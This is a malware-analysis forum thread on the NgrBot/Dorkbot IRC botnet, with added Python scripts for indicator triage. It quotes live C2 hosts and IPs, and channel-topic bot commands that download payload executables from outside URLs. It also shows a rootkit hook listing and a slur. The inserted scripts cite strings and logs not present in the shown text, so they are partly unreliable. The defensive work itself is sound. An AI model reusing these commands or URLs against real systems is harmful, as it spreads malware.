* Connecting to smellypussy.info (115.146.19.158) port 6667...
* Connected. Now logging in...
*
* *** If you are having problems connecting due to ping timeouts, please type /quote pong 20CC5620 or /raw pong 20CC5620 now.
 GARBAGE: 001 get.my.front
* 002 002 002
* 003 003 003
* 004 004 004
* 005 005 005
* 005 005 005
* 005 005 005
/nick n{US|XPa}cpfqbfr
* You are now known as n{US|XPa}cpfqbfr
/join #boss ngrBot

--> Now talking on #boss
* Topic for #boss is: !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s
* Topic for #boss set by b at Tue May 31 19:04:22 2011

/msg b Hi
>b< Hi
/msg b sup faggot ?
>b< sup faggot ?
* *** You are permanently banned from HTTP (abc)
* Closing Link: n{US|XPa}cpfqbfr[str90-1-82-218-120-144.fbx.proxad.net] (User has been permanently banned from HTTP (abc))



Only the chan OP can see connected bots; orders are launched via the topic title.

The nbiz.exe in the topic title is compressed with the obnubilate online cryptor (onlinecrypter.com).
NgrBot is easily recognizable with Process Explorer.
[screenshots not preserved]

Have fun.
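As an added example (my code, not from the thread and not NgrBot's), here is a Python triage script that pulls the C2 indicators out of an IRC client transcript like the one in this post and splits the channel topic into the bot commands whose names (http.int, http.set, msn.int, msn.set, mdns, dl) match the command strings dumped from memory above. The sample session embedded in the script is built from the lines quoted in the post; the nick heuristic, the "!" command grammar and the reading of the topic as the command channel are assumptions drawn from what the transcript shows.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the session lines quoted in the thread, trimmed to the
# ones that carry indicators. Illustrative input, not a fresh capture.
SAMPLE_SESSION = """\
* Looking up smellypussy.info
* Connecting to smellypussy.info (115.146.19.158) port 6667...
* Connected. Now logging in...
/nick n{US|XPa}cpfqbfr
* You are now known as n{US|XPa}cpfqbfr
/join #boss ngrBot
--> Now talking on #boss
* Topic for #boss is: !http.int 6 !http.set wowww!! hahahaha http://smurl.name/3bh6?=facebook_photos_31_05_2011_jpg !msn.int 6 !msn.set wowww!! hahahaha http://x.vu/fbimages1?=facebook_photos_31_05_2011_jpg !mdns http://www.freewebtown.com/usermx/av.txt !dl http://www.freewebtown.com/usermx/nbiz.exe -n !s
* Topic for #boss set by b at Tue May 31 19:04:22 2011
"""

# Heuristic (assumption): the observed nick n{US|XPa}cpfqbfr reads as
# n{COUNTRY|OS+letter}random. Human IRC users rarely pick nicks of that shape.
BOT_NICK = re.compile(r"^n\{[A-Z]{2}\|[A-Za-z0-9]{2,4}\}[a-z0-9]{5,}$")

CONNECT = re.compile(r"^\* Connecting to (\S+) \((\d{1,3}(?:\.\d{1,3}){3})\) port (\d+)")
NICK = re.compile(r"^/nick (\S+)")
JOIN = re.compile(r"^/join (#\S+)(?:\s+(\S+))?")
TOPIC = re.compile(r"^\* Topic for (#\S+) is: (.*)$")
URL = re.compile(r"https?://\S+")


@dataclass
class SessionIndicators:
    server: str = ""
    ip: str = ""
    port: int = 0
    nick: str = ""
    bot_like_nick: bool = False
    channel: str = ""
    channel_key: str = ""
    commands: list = field(default_factory=list)  # (name, argument string)
    urls: list = field(default_factory=list)


def parse_topic_commands(topic: str):
    """Split a channel topic into (command, args) pairs.

    A token starting with '!' followed by a letter opens a new command; every
    other token is appended to the most recent command's arguments. The '!'
    prefix is an observation from the #boss topic, not a documented grammar.
    """
    cmds = []
    for tok in topic.split():
        if len(tok) > 1 and tok[0] == "!" and tok[1].isalpha():
            cmds.append((tok[1:], []))
        elif cmds:
            cmds[-1][1].append(tok)
    return [(name, " ".join(args)) for name, args in cmds]


def triage_session(text: str) -> SessionIndicators:
    """Pull C2 server, channel, key, nick and topic commands out of a transcript."""
    ind = SessionIndicators()
    for line in text.splitlines():
        if m := CONNECT.match(line):
            ind.server, ind.ip, ind.port = m.group(1), m.group(2), int(m.group(3))
        elif m := NICK.match(line):
            ind.nick = m.group(1)
            ind.bot_like_nick = bool(BOT_NICK.match(ind.nick))
        elif m := JOIN.match(line):
            ind.channel, ind.channel_key = m.group(1), m.group(2) or ""
        elif m := TOPIC.match(line):
            ind.commands = parse_topic_commands(m.group(2))
            # Every URL in the topic is a spread link, a blocklist or a payload: hunt for all of them.
            ind.urls = [u for _, args in ind.commands for u in URL.findall(args)]
    return ind


if __name__ == "__main__":
    r = triage_session(SAMPLE_SESSION)
    print(f"C2 {r.server} ({r.ip}) port {r.port}, channel {r.channel} key {r.channel_key}")
    print(f"nick {r.nick} bot-like={r.bot_like_nick}")
    for name, args in r.commands:
        print(f"  !{name:<9} {args}")
    print("URLs to block/hunt:", *r.urls, sep="\n  ")
```

The parser treats everything between two "!" tokens as one argument string, so the spread message ("wowww!! hahahaha http://...") survives intact even though it contains exclamation marks; the "-n" after the !dl URL is kept as part of that command's arguments rather than guessed at.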
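Added example, not from the thread: the "Resolved" lines in this post show three domains rotating over one small pool of addresses. This Python script parses those lines into a domain-to-IP table, computes the pool shared by all three names, and runs a constructed DNS/connection log through it to flag hosts that contacted the C2. The log format, the client addresses and the "weak" treatment of api.wipmania.com (a public IP geolocation service that appears in the strings dump) are assumptions.

```python
import re
from collections import defaultdict

# Resolutions quoted in the thread ("Resolved : [domain] To [ip]" lines).
RESOLVED_LOG = """\
Resolved : [keshmoney.biz] To [204.15.252.199]
Resolved : [keshmoney.biz] To [115.146.19.158]
Resolved : [keshmoney.biz] To [61.31.99.67]
Resolved : [keshmoney.biz] To [89.238.176.123]
Resolved : [heytherebitch.com] To [115.146.19.158]
Resolved : [heytherebitch.com] To [204.15.252.199]
Resolved : [heytherebitch.com] To [89.238.176.123]
Resolved : [smellypussy.info] To [204.15.252.199]
Resolved : [smellypussy.info] To [89.238.176.123]
Resolved : [smellypussy.info] To [115.146.19.158]
Resolved : [smellypussy.info] To [61.31.99.67]
"""

# api.wipmania.com is in the strings dump. It is a public geolocation service,
# so a lookup is only a weak hint on its own (assumption: the bot uses it to
# learn the country code that appears in its nick).
WEAK_DOMAINS = {"api.wipmania.com"}
IRC_PORT = 6667  # port seen in the session transcript

# Constructed sample log: "<time> <client> dns <name>" or "<time> <client> connect <ip>:<port>".
SAMPLE_LOG = """\
2011-05-31T20:10:03Z 10.0.0.12 dns keshmoney.biz
2011-05-31T20:10:04Z 10.0.0.12 connect 204.15.252.199:6667
2011-05-31T20:11:17Z 10.0.0.23 dns www.microsoft.com
2011-05-31T20:12:40Z 10.0.0.40 connect 89.238.176.123:6667
2011-05-31T20:13:02Z 10.0.0.51 connect 8.8.8.8:53
2011-05-31T20:13:50Z 10.0.0.12 dns api.wipmania.com
2011-05-31T20:14:10Z 10.0.0.23 dns api.wipmania.com
"""

RESOLVED = re.compile(r"Resolved : \[(\S+)\] To \[(\S+)\]")


def parse_resolutions(text):
    """domain -> set of IPs it resolved to."""
    table = defaultdict(set)
    for dom, ip in RESOLVED.findall(text):
        table[dom].add(ip)
    return dict(table)


def shared_ip_pool(resolutions):
    """IPs every C2 domain resolved to: the names are aliases for one pool."""
    sets = list(resolutions.values())
    return set.intersection(*sets) if sets else set()


def find_hits(resolutions, log_text):
    """client -> list of (severity, reason); clients with only weak hits are dropped."""
    c2_ips = set().union(*resolutions.values())
    hits = defaultdict(list)
    for line in log_text.splitlines():
        _, client, kind, value = line.split()
        if kind == "dns":
            if value in resolutions:
                hits[client].append(("strong", f"resolved C2 domain {value}"))
            elif value in WEAK_DOMAINS:
                hits[client].append(("weak", f"geolocation lookup {value}"))
        elif kind == "connect":
            ip, port = value.rsplit(":", 1)
            if ip in c2_ips:
                sev = "strong" if int(port) == IRC_PORT else "medium"
                hits[client].append((sev, f"connected to C2 address {value}"))
    return {c: r for c, r in hits.items() if any(s != "weak" for s, _ in r)}


if __name__ == "__main__":
    res = parse_resolutions(RESOLVED_LOG)
    print("shared C2 pool:", sorted(shared_ip_pool(res)))
    for client, reasons in find_hits(res, SAMPLE_LOG).items():
        print(client)
        for sev, why in reasons:
            print(f"  [{sev}] {why}")
```

Matching on the IP pool as well as the names matters here: a host whose DNS is already hooked by the bot (see the GetAddrInfoW hook later in the thread) may never show a clean query in your resolver logs, but its outbound connection to 6667 still does.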

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Meriadoc » Wed Jun 01, 2011 1:22 am

From 28th May, MD5: 680ba129b60d293fb10b77fc00b99799, VT 14/42: http://www.virustotal.com/file-scan/rep ... 1306665659
Who controls the past controls the future
Who controls the present controls the past

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Wed Jun 01, 2011 3:45 pm

[attachment only; not preserved]

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Thu Jun 09, 2011 9:04 am

I just picked up one of this family :D

While working it creates on USB flash shortcuts to all directories in the root, with a funny call to the actual malware binary stored as usual in RECYCLER.

Contains some surprises for crackers :)

X-a: b
\\.\PHYSICALDRIVE0 00100 %d. SeShutdownPrivilege NtShutdownSystem This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!


And some rootkit functionality is included on board too, so looking for it with something like Autoruns is a useless idea.

[1368]explorer.exe-->ntdll.dll-->NtEnumerateValueKey, Type: Inline - RelativeJump 0x7C90D2D0-->02176390 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtQueryDirectoryFile, Type: Inline - RelativeJump 0x7C90D750-->02176640 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtResumeThread, Type: Inline - RelativeJump 0x7C90DB20-->021753D0 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump 0x7C9163A3-->02175300 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileA, Type: Inline - RelativeJump 0x7C801A28-->021711C0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileW, Type: Inline - RelativeJump 0x7C8107F0-->02171290 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileW, Type: Inline - RelativeJump 0x7C821249-->02172570 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileA, Type: Inline - RelativeJump 0x7C8286D6-->02171000 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileW, Type: Inline - RelativeJump 0x7C82F863-->021710A0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileA, Type: Inline - RelativeJump 0x7C835EA7-->02172510 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump 0x771B60A1-->021720A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->InternetWriteFile, Type: Inline - RelativeJump 0x771E8BB9-->021723A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump 0x77202EBC-->02172160 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->GetAddrInfoW, Type: Inline - RelativeJump 0x71A92899-->02171D10 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->send, Type: Inline - RelativeJump 0x71A94C27-->02177250 [unknown_code_page]


The binary hides in X:\Documents and Settings\UserName\Application Data. It loads through the HKCU Run key, maps the payload into processes' address spaces and exits.
Ring0 - the source of inspiration
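Added example (my code, not EP_X0FF's and not the hook scanner's): parse the hook listing from this post, group the hooked APIs by module, show that every hook destination falls inside one small unbacked region (which is what the unknown_code_page tag is telling you), and decode the 5-byte E9 rel32 patch that "Inline - RelativeJump" refers to. The capability labels are an analyst's reading of the APIs against the log strings in the sample ([FTP Login], [HTTP Traffic], [DNS]: Blocked ...), the prologue bytes in the test are constructed, and nothing here reads live process memory.

```python
import re
import struct
from collections import defaultdict

# The hook listing quoted in the thread (explorer.exe, PID 1368).
HOOK_LISTING = """\
[1368]explorer.exe-->ntdll.dll-->NtEnumerateValueKey, Type: Inline - RelativeJump 0x7C90D2D0-->02176390 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtQueryDirectoryFile, Type: Inline - RelativeJump 0x7C90D750-->02176640 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->NtResumeThread, Type: Inline - RelativeJump 0x7C90DB20-->021753D0 [unknown_code_page]
[1368]explorer.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump 0x7C9163A3-->02175300 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileA, Type: Inline - RelativeJump 0x7C801A28-->021711C0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CreateFileW, Type: Inline - RelativeJump 0x7C8107F0-->02171290 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileW, Type: Inline - RelativeJump 0x7C821249-->02172570 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileA, Type: Inline - RelativeJump 0x7C8286D6-->02171000 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->CopyFileW, Type: Inline - RelativeJump 0x7C82F863-->021710A0 [unknown_code_page]
[1368]explorer.exe-->kernel32.dll-->MoveFileA, Type: Inline - RelativeJump 0x7C835EA7-->02172510 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump 0x771B60A1-->021720A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->InternetWriteFile, Type: Inline - RelativeJump 0x771E8BB9-->021723A0 [unknown_code_page]
[1368]explorer.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump 0x77202EBC-->02172160 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->GetAddrInfoW, Type: Inline - RelativeJump 0x71A92899-->02171D10 [unknown_code_page]
[1368]explorer.exe-->ws2_32.dll-->send, Type: Inline - RelativeJump 0x71A94C27-->02177250 [unknown_code_page]
"""

HOOK_LINE = re.compile(
    r"\[(?P<pid>\d+)\](?P<proc>\S+?)-->(?P<module>\S+?)-->(?P<func>\w+), "
    r"Type: Inline - RelativeJump 0x(?P<src>[0-9A-Fa-f]+)-->(?P<dst>[0-9A-Fa-f]+)"
)

# Analyst inference (not documented by the sample): what each hooked API buys
# the bot, keyed by the API name with its A/W suffix removed.
API_PURPOSE = {
    "NtEnumerateValueKey": "hide its Run key value from registry enumeration",
    "NtQueryDirectoryFile": "hide its file from directory listings",
    "NtResumeThread": "inject into every newly created process",
    "LdrLoadDll": "re-hook modules as they are loaded into the process",
    "CreateFile": "guard or redirect access to its own file",
    "CopyFile": "intercept file copies (self-protection, USB spreading)",
    "MoveFile": "intercept file moves (self-protection)",
    "HttpSendRequest": "steal HTTP logins / tamper with HTTP traffic",
    "InternetWriteFile": "capture POSTed form data",
    "GetAddrInfo": "block resolution of AV/update domains (the dns/mdns list)",
    "send": "sniff FTP and POP3 logins on raw sockets",
}


def parse_hook_listing(text):
    hooks = []
    for line in text.splitlines():
        m = HOOK_LINE.search(line)
        if m:
            hooks.append({"pid": int(m["pid"]), "process": m["proc"], "module": m["module"],
                          "function": m["func"], "src": int(m["src"], 16), "dst": int(m["dst"], 16)})
    return hooks


def hooks_by_module(hooks):
    out = defaultdict(list)
    for h in hooks:
        out[h["module"]].append(h["function"])
    return dict(out)


def target_region(hooks):
    """Lowest and highest hook destination: a tight range means one injected blob."""
    dsts = [h["dst"] for h in hooks]
    return min(dsts), max(dsts)


def capabilities(hooks):
    names = {re.sub(r"[AW]$", "", h["function"]) for h in hooks}
    return sorted(API_PURPOSE[n] for n in names if n in API_PURPOSE)


def make_relative_jump(src, dst):
    """The 5-byte E9 patch a hook engine writes at src to reach dst (demo only)."""
    rel = (dst - (src + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", rel)


def decode_relative_jump(prologue, src):
    """Jump target if the bytes at src start with E9 rel32, else None (clean prologue)."""
    if len(prologue) < 5 or prologue[0] != 0xE9:
        return None
    rel = struct.unpack("<i", prologue[1:5])[0]
    return (src + 5 + rel) & 0xFFFFFFFF


if __name__ == "__main__":
    hooks = parse_hook_listing(HOOK_LISTING)
    lo, hi = target_region(hooks)
    print(f"{len(hooks)} hooks, all landing in {lo:#010x}-{hi:#010x}")
    for mod, funcs in hooks_by_module(hooks).items():
        print(f"  {mod}: {', '.join(funcs)}")
    for cap in capabilities(hooks):
        print("  ->", cap)
```

The decode is the check a scanner performs: read the first bytes of an exported function, and if they are E9 followed by a rel32, compute src + 5 + rel32 and ask whether that address belongs to a loaded module. For every entry in this listing it does not, hence unknown_code_page.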

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Sun Jun 19, 2011 1:19 pm

Backdoor NgrBot

http://www.virustotal.com/file-scan/report.html?id=07b579442ca01b55f4626e52f81781a06883807e203010d39608db5c2de105cd-1307488247

Attached: original dropper, unpacked, and unpacked with decrypted strings.

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Wed Jul 20, 2011 2:07 pm

VT: 3/43 >> 7.0%
http://www.virustotal.com/file-scan/rep ... 1311018492
VT: 5/43 >> 11.6%
http://www.virustotal.com/file-scan/rep ... 1311163254

193.106.172.77/1337
#gBot gBot

Code:
--> Now talking on #gBot
* Topic for #gBot is: .prot http://dl.dropbox.com/u/27486363/GbotF.exe
* Topic for #gBot set by Amaze at Wed Jul 20 05:53:57 2011
* Amaze gives channel operator status to Amaze
* Amaze sets ban on *!*@67F2E02B.8691F5BC.D0299.IP
<-- You have been kicked from #gBot by Amaze (Amaze)

Hello Amaze :)

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Fri Jul 22, 2011 6:04 pm

Newest version of NgrBot (and the bad guys used a VB crypter on it)

13/43 >> 30.2%
https://www.virustotal.com/file-scan/re ... 1311306469

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Tue Jul 26, 2011 3:56 pm

[attachment only; not preserved]

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby EP_X0FF » Mon Aug 01, 2011 10:41 am

One more for the collection.

Attached: original and unpacked.

Re: NgrBot (aka Win32/Dorkbot.gen!A)

Postby Xylitol » Mon Aug 01, 2011 9:54 pm

[attachment only; not preserved]
